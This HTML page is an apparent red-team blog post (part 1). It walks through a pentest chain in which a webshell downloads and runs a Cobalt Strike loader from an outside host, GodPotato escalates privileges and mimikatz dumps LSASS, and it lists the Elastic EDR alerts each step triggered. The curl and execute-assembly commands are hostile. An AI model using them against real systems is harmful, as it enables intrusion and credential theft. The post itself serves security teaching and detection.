<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>Increase your stealth capabilities - part 1 | sokarepo</title>
<meta name="generator" content="Jekyll v4.2.2" />
<meta property="og:title" content="Increase your stealth capabilities - part 1" />
<meta name="author" content="soka" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="In a recent assessment, my teammates and I were tasked to perform a web security review of several applications with the possibility to perform internal pentest if the opportunity came up." />
<meta property="og:description" content="In a recent assessment, my teammates and I were tasked to perform a web security review of several applications with the possibility to perform internal pentest if the opportunity came up." />
<link rel="canonical" href="https://sokarepo.github.io//redteam/2024/01/04/increase-your-stealth-capabilities-part1.html" />
<meta property="og:url" content="https://sokarepo.github.io//redteam/2024/01/04/increase-your-stealth-capabilities-part1.html" />
<meta property="og:site_name" content="sokarepo" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-01-04T00:00:00+01:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="Increase your stealth capabilities - part 1" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"soka"},"dateModified":"2024-01-04T00:00:00+01:00","datePublished":"2024-01-04T00:00:00+01:00","description":"In a recent assessment, my teammates and I were tasked to perform a web security review of several applications with the possibility to perform internal pentest if the opportunity came up.","headline":"Increase your stealth capabilities - part 1","mainEntityOfPage":{"@type":"WebPage","@id":"https://sokarepo.github.io//redteam/2024/01/04/increase-your-stealth-capabilities-part1.html"},"url":"https://sokarepo.github.io//redteam/2024/01/04/increase-your-stealth-capabilities-part1.html"}</script>
<!-- End Jekyll SEO tag -->


<meta name="keywords" content="" />

<link rel="shortcut icon" href="/favicon.ico" />
<link rel="apple-touch-icon" href="/favicon.ico"/>
<link rel="stylesheet" type="text/css" href="/assets/css/styles.css" />
<link rel="stylesheet" type="text/css" href="/assets/css/prism.css" />
<script src="/assets/js/prism.js"></script>

</head>

<body>
    <div class="wrapper">
        <header class="wrapper-header">
            <div class="header">
    <h1>Offsec notes</h1>
    <br>
    <h5><i>Web, Active Directory and Maldev stuff</i></h5>
    <br>
    <nav>
    
    <a href="/posts">Posts</a>
    
    <a href="/categories/">Categories</a>
    
    <a href="/contact">About & Contact</a>
    
</nav>
    <hr>
</div>
        </header>

        <main class="wrapper-main">
            <div class="main-content">
            <div class="post-info">
    <h2>Increase your stealth capabilities - part 1</h2>
    <p>04 Jan 2024 - soka</p>
</div>

<div class="post-content">
<p>In a recent assessment, my teammates and I were tasked to perform a web security review of several applications with the possibility to perform internal pentest if the opportunity came up.</p>

<p>On one of the application, we successfully uploaded a aspx webshell which executes Windows cmd.
The engagement didn’t require us to be stealthy and the goal of this blog post is to reproduce our what we did with Elastic EDR watching us.</p>

<h2 id="web-rce">Web RCE</h2>

<p>We downloaded our CobaltStrike loader and executed it</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">&gt;</span> curl http://website.crash.lab/webshell.aspx <span class="nt">--data</span> <span class="s1">'70c1cc863a=powershell wget http://xxxx.com/load.exe -outfile C:\Windows\Temp\load.exe'</span>
<span class="o">&gt;</span> curl http://website.crash.lab/webshell.aspx <span class="nt">--data</span> <span class="s1">'70c1cc863a=C:\Windows\Temp\load.exe'</span>
</code></pre></div></div>

<p>And we got our beacon back
<br /></p>

<p><img src="/assets/images/redteam/2024-01-04-increase-your-stealth-capabilities/Pasted image 20230908164217.png" alt="Cobalt Strike beacon" />
<br /></p>

<p>If we look at the alerts in Elastic EDR, we can see that we were very noisy.</p>

<p><img src="/assets/images/redteam/2024-01-04-increase-your-stealth-capabilities/Pasted image 20230908151601.png" alt="Elastic EDR detections" />
<br /></p>

<ul>
  <li><code class="language-plaintext highlighter-rouge">Web Shell Detection: Script Process Child of Common Web Processes</code> because the IIS process <code class="language-plaintext highlighter-rouge">w3wp.exe</code> spawned <code class="language-plaintext highlighter-rouge">cmd.exe</code></li>
  <li><code class="language-plaintext highlighter-rouge">Malicious Behavior Detection Alert: Suspicious Microsoft IIS Worker Descendant</code> because the IIS process <code class="language-plaintext highlighter-rouge">w3wp.exe</code> spawned <code class="language-plaintext highlighter-rouge">cmd.exe</code> that suggest the web server has been compromised</li>
  <li><code class="language-plaintext highlighter-rouge">Remote File Download via PowerShell</code> because of the <code class="language-plaintext highlighter-rouge">wget</code> Powershell command to download our loader</li>
  <li><code class="language-plaintext highlighter-rouge">Memory Threat Detection Alert: Windows.Trojan.CobaltStrike</code> because Elastic EDR Yara rules flagged our beacon in memory</li>
  <li><code class="language-plaintext highlighter-rouge">Malicious Behavior Detection Alert: Network Module Loaded from Suspicious Unbacked Memory</code> - as our beacon is stored in unbacked memory, Elastic EDR caught an API call that came from this suspicious region</li>
</ul>

<p><br />
The next step of our exploitation was to escalate our privileges from Local Service Account to Local Administrator.</p>

<p>We can do it in two different ways:</p>
<ul>
  <li>abuse <code class="language-plaintext highlighter-rouge">SeImpersonatePrivilege</code> privilege to escalate to SYSTEM (we used this way during the engagement)</li>
  <li>abuse Kerberos <code class="language-plaintext highlighter-rouge">S4U2Self</code> to generate a Service Ticket for a domain user which has local administrator right</li>
</ul>

<p><br /></p>

<h2 id="eop---seimpersonateprivilege">EoP - SeImpersonatePrivilege</h2>

<p>We used <a href="https://github.com/BeichenDream/GodPotato">GodPotato</a> to exploit the <code class="language-plaintext highlighter-rouge">SeImpersonatePrivilege</code></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>beacon&gt; execute-assembly /home/user/Tools/Windows/GodPotato-NET4.exe -cmd "cmd /c C:\Windows\Temp\load.exe"
</code></pre></div></div>

<p>And we got our SYSTEM beacon back.
<br />
<img src="/assets/images/redteam/2024-01-04-increase-your-stealth-capabilities/Pasted image 20231006103045.png" alt="SYSTEM beacon" />
<br /></p>

<p>The last action raised the following alerts:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">Malicious Behavior Detection Alert: Microsoft Common Language Runtime Loaded from Suspicious Memory</code> - because <code class="language-plaintext highlighter-rouge">CLR.dll</code> has been loaded by the post-exploit temporary process</li>
  <li><code class="language-plaintext highlighter-rouge">Malicious Behavior Detection Alert: AMSI or WLDP Bypass via Memory Patching</code> - the CobaltStrike AMSI patch has been flagged</li>
</ul>

<h2 id="lsass-dump">LSASS dump</h2>

<p>After we gained NT SYSTEM privileges, we launched the built-in mimikatz command to dump credentials from LSASS.</p>

<p><img src="/assets/images/redteam/2024-01-04-increase-your-stealth-capabilities/Pasted image 20231009144233.png" alt="logonpasswords" />
<br /></p>

<p>Which raised:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">LSASS Process Access via Windows API</code></li>
  <li>Mimikatz detected from memory</li>
  <li><code class="language-plaintext highlighter-rouge">LSASS Access Attempt from Unbacked Memory</code></li>
</ul>

<p><br />
<img src="/assets/images/redteam/2024-01-04-increase-your-stealth-capabilities/Pasted image 20231009160453.png" alt="logonpasswords detection" />
<br /></p>

<h2 id="conclusion">Conclusion</h2>

<p>As we can saw, there are plenty opportunities to detect our actions during the different phase of the attack path:</p>
<ul>
  <li>execution of a webshell</li>
  <li>execution of an .NET assembly through execute-assembly</li>
  <li>LSASS dump</li>
</ul>

<p>In the next part I will go through each steps again but with detection in mind.</p>

</div>
            </div>
        </main>
    </div>

    <footer class="wrapper-footer">
        <div class="footer">
    <span class="footer-text float-left">This work is licensed under <a rel="license" href="https://www.gnu.org/licenses/gpl-3.0.en.html" target="_blank">GPLv3</a></span>
    <span class="footer-text float-right">
    Site Updated: 2024-01-04  (<a href="/feed.xml" target="_blank">RSS</a>)
  </span>
</div>
    </footer>
</body>
</html>
